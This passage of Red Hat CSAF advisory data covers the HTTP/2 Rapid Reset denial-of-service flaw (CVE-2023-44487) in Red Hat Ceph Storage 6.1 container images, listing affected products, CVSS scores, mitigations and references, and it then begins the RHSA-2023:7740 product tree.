"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2023:7741" }, { "category": "workaround", "details": "The default stream concurrency limit in golang is 250 streams (requests) per HTTP/2 connection. This value may be adjusted in the golang.org/x/net/http2 package using the Server.MaxConcurrentStreams setting and the ConfigureServer function which are available in golang.org/x/net/http2.", "product_ids": [ "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64" ] } ], "threats": [ { "category": "impact", "details": "Important" } ], "title": "golang: net/http, x/net/http2: rapid stream resets can cause excessive work (CVE-2023-44487)" }, { "cve": "CVE-2023-44487", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2023-10-09T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2242803" } ], "notes": [ { "category": "description", "text": "A flaw was found in handling multiplexed streams in the HTTP/2 protocol. A client can repeatedly make a request for a new multiplex stream and immediately send an RST_STREAM frame to cancel it. This creates extra work for the server setting up and tearing down the streams while not hitting any server-side limit for the maximum number of active streams per connection, resulting in a denial of service due to server resource consumption. Red Hat has rated the severity of this flaw as \u0027Important\u0027 as the US Cybersecurity and Infrastructure Security Agency (CISA) declared this vulnerability an active exploit.\r\n\r\nCVE-2023-39325 was assigned for the Rapid Reset Attack in the Go language packages.\r\n\r\nSecurity Bulletin\r\nhttps://access.redhat.com/security/vulnerabilities/RHSB-2023-003", "title": "Vulnerability description" }, { "category": "summary", "text": "HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack)", "title": "Vulnerability summary" }, { "category": "other", "text": "NGINX has been marked as Moderate Impact because, for performance and resource consumption reasons, NGINX limits the number of concurrent streams to a default of 128. In addition, to optimally balance network and server performance, NGINX allows the client to persist HTTP connections for up to 1000 requests by default using an HTTP keepalive.\n\nThe majority of RHEL utilities are not long-running applications; instead, they are command-line tools. These tools utilize Golang package as build-time dependency, which is why they are classified as having a \"Moderate\" level of impact.\n\nrhc component is no longer impacted by CVE-2023-44487 \u0026 CVE-2023-39325.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64" ], "known_not_affected": [ "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2023-44487" }, { "category": "external", "summary": "RHBZ#2242803", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242803" }, { "category": "external", "summary": "RHSB-2023-003", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2023-003" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2023-44487", "url": "https://www.cve.org/CVERecord?id=CVE-2023-44487" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-44487", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-44487" }, { "category": "external", "summary": "https://github.com/dotnet/announcements/issues/277", "url": "https://github.com/dotnet/announcements/issues/277" }, { "category": "external", "summary": "https://pkg.go.dev/vuln/GO-2023-2102", "url": "https://pkg.go.dev/vuln/GO-2023-2102" }, { "category": "external", "summary": "https://www.cisa.gov/news-events/alerts/2023/10/10/http2-rapid-reset-vulnerability-cve-2023-44487", "url": "https://www.cisa.gov/news-events/alerts/2023/10/10/http2-rapid-reset-vulnerability-cve-2023-44487" }, { "category": "external", "summary": "https://www.nginx.com/blog/http-2-rapid-reset-attack-impacting-f5-nginx-products/", "url": "https://www.nginx.com/blog/http-2-rapid-reset-attack-impacting-f5-nginx-products/" }, { "category": "external", "summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog" } ], "release_date": "2023-10-10T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2023-12-12T13:55:37+00:00", "details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_ceph_storage/6\n\nFor supported configurations, refer to:\n\nhttps://access.redhat.com/articles/1548993", "product_ids": [ "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2023:7741" }, { "category": "workaround", "details": "Users are strongly urged to update their software as soon as fixes are available. \nThere are several mitigation approaches for this flaw. \n\n1. If circumstances permit, users may disable http2 endpoints to circumvent the flaw altogether until a fix is available.\n2. IP-based blocking or flood protection and rate control tools may be used at network endpoints to filter incoming traffic.\n3. Several package specific mitigations are also available. \n a. nginx: https://www.nginx.com/blog/http-2-rapid-reset-attack-impacting-f5-nginx-products/\n b. netty: https://github.com/netty/netty/security/advisories/GHSA-xpw8-rcwv-8f8p\n c. haproxy: https://www.haproxy.com/blog/haproxy-is-not-affected-by-the-http-2-rapid-reset-attack-cve-2023-44487\n d. nghttp2: https://github.com/nghttp2/nghttp2/security/advisories/GHSA-vx74-f528-fxqg\n e. golang: The default stream concurrency limit in golang is 250 streams (requests) per HTTP/2 connection. This value may be adjusted in the golang.org/x/net/http2 package using the Server.MaxConcurrentStreams setting and the ConfigureServer function which are available in golang.org/x/net/http2.", "product_ids": [ "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64" ] } ], "threats": [ { "category": "exploit_status", "date": "2023-10-10T00:00:00+00:00", "details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog" }, { "category": "impact", "details": "Important" } ], "title": "HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack)" } ] }
rhsa-2023_7740
Vulnerability from csaf_redhat
Notes
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Moderate" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "An update is now available for Red Hat Ceph Storage 6.1 in the Red Hat Ecosystem Catalog", "title": "Topic" }, { "category": "general", "text": "Red Hat Ceph Storage is a scalable, open, software-defined storage platform that combines the most stable version of the Ceph storage system with a Ceph management platform, deployment utilities, and support services.\n\nThese new packages include numerous enhancements, and bug fixes. Space precludes documenting all of these changes in this advisory. Users are directed to the Red Hat Ceph Storage Release Notes for information on the most significant of these changes:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_ceph_storage/6.1/html/release_notes/index", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2023:7740", "url": "https://access.redhat.com/errata/RHSA-2023:7740" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#moderate", "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "category": "external", "summary": "2181424", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2181424" }, { "category": "external", "summary": "2182385", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2182385" }, { "category": "external", "summary": "2210840", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2210840" }, { "category": "external", "summary": "2210848", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2210848" }, { "category": "external", "summary": "2211324", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2211324" }, { "category": "external", "summary": "2213873", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2213873" }, { "category": "external", "summary": "2227807", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2227807" }, { "category": "external", "summary": "2227999", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2227999" }, { "category": "external", "summary": "2228065", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2228065" }, { "category": "external", "summary": "2232663", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2232663" }, { "category": "external", "summary": "2237881", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2237881" }, { "category": "external", "summary": "2238666", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2238666" }, { "category": "external", "summary": "2239449", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2239449" }, { "category": "external", "summary": "2240143", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2240143" }, { "category": "external", "summary": "2240838", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2240838" }, { "category": "external", "summary": "2241201", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2241201" }, { "category": "external", "summary": "2243741", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2243741" }, { "category": "external", "summary": "2244978", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2244978" }, { "category": "external", "summary": "2245147", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245147" }, { "category": "external", "summary": "2245697", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245697" }, { "category": "external", "summary": "2247543", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2247543" }, { "category": "external", "summary": "2249814", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2249814" }, { "category": "external", "summary": "2249958", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2249958" }, { "category": "external", "summary": "2252256", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2252256" }, { "category": "external", "summary": "2252337", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2252337" }, { "category": "external", "summary": "2252792", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2252792" }, { "category": "external", "summary": "2252878", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2252878" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2023/rhsa-2023_7740.json" } ], "title": "Red Hat Security Advisory: Red Hat Ceph Storage 6.1 security, enhancements, and bug fix update", "tracking": { "current_release_date": "2024-11-06T04:31:12+00:00", "generator": { "date": "2024-11-06T04:31:12+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.1.1" } }, "id": "RHSA-2023:7740", "initial_release_date": "2023-12-12T13:59:00+00:00", "revision_history": [ { "date": "2023-12-12T13:59:00+00:00", "number": "1", "summary": "Initial version" }, { "date": "2023-12-12T13:59:00+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-11-06T04:31:12+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Red Hat Ceph Storage 6.1 Tools", "product": { "name": "Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools", "product_identification_helper": { "cpe": "cpe:/a:redhat:ceph_storage:6.1::el9" } } } ], "category": "product_family", "name": "Red Hat Ceph Storage" }, { "branches": [ { "category": "product_version", "name": "cephadm-ansible-1:2.18.0-1.el9cp.src", "product": { "name": "cephadm-ansible-1:2.18.0-1.el9cp.src", "product_id": "cephadm-ansible-1:2.18.0-1.el9cp.src", "product_identification_helper": { "purl": "pkg:rpm/redhat/cephadm-ansible@2.18.0-1.el9cp?arch=src\u0026epoch=1" } } }, { "category": "product_version", "name": "ceph-2:17.2.6-167.el9cp.src", "product": { "name": "ceph-2:17.2.6-167.el9cp.src", "product_id": "ceph-2:17.2.6-167.el9cp.src", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph@17.2.6-167.el9cp?arch=src\u0026epoch=2" } } } ], "category": "architecture", "name": "src" }, { "branches": [ { "category": "product_version", "name": "cephadm-ansible-1:2.18.0-1.el9cp.noarch", "product": { "name": "cephadm-ansible-1:2.18.0-1.el9cp.noarch", "product_id": "cephadm-ansible-1:2.18.0-1.el9cp.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/cephadm-ansible@2.18.0-1.el9cp?arch=noarch\u0026epoch=1" } } }, { "category": "product_version", "name": "ceph-mib-2:17.2.6-167.el9cp.noarch", "product": { "name": "ceph-mib-2:17.2.6-167.el9cp.noarch", "product_id": "ceph-mib-2:17.2.6-167.el9cp.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-mib@17.2.6-167.el9cp?arch=noarch\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-resource-agents-2:17.2.6-167.el9cp.noarch", "product": { "name": "ceph-resource-agents-2:17.2.6-167.el9cp.noarch", "product_id": "ceph-resource-agents-2:17.2.6-167.el9cp.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-resource-agents@17.2.6-167.el9cp?arch=noarch\u0026epoch=2" } } }, { "category": "product_version", "name": "cephadm-2:17.2.6-167.el9cp.noarch", "product": { "name": "cephadm-2:17.2.6-167.el9cp.noarch", "product_id": "cephadm-2:17.2.6-167.el9cp.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/cephadm@17.2.6-167.el9cp?arch=noarch\u0026epoch=2" } } }, { "category": "product_version", "name": "cephfs-top-2:17.2.6-167.el9cp.noarch", "product": { "name": "cephfs-top-2:17.2.6-167.el9cp.noarch", "product_id": "cephfs-top-2:17.2.6-167.el9cp.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/cephfs-top@17.2.6-167.el9cp?arch=noarch\u0026epoch=2" } } } ], "category": "architecture", "name": "noarch" }, { "branches": [ { "category": "product_version", "name": "ceph-base-2:17.2.6-167.el9cp.x86_64", "product": { "name": "ceph-base-2:17.2.6-167.el9cp.x86_64", "product_id": "ceph-base-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-base@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-common-2:17.2.6-167.el9cp.x86_64", "product": { "name": "ceph-common-2:17.2.6-167.el9cp.x86_64", "product_id": "ceph-common-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-common@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-fuse-2:17.2.6-167.el9cp.x86_64", "product": { "name": "ceph-fuse-2:17.2.6-167.el9cp.x86_64", "product_id": "ceph-fuse-2:17.2.6-167.el9cp.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/ceph-fuse@17.2.6-167.el9cp?arch=x86_64\u0026epoch=2" } } }, { "category": "product_version", "name": "ceph-immutable-object-cache-2:17.2.6-167.el9cp.x86_64", "product": { 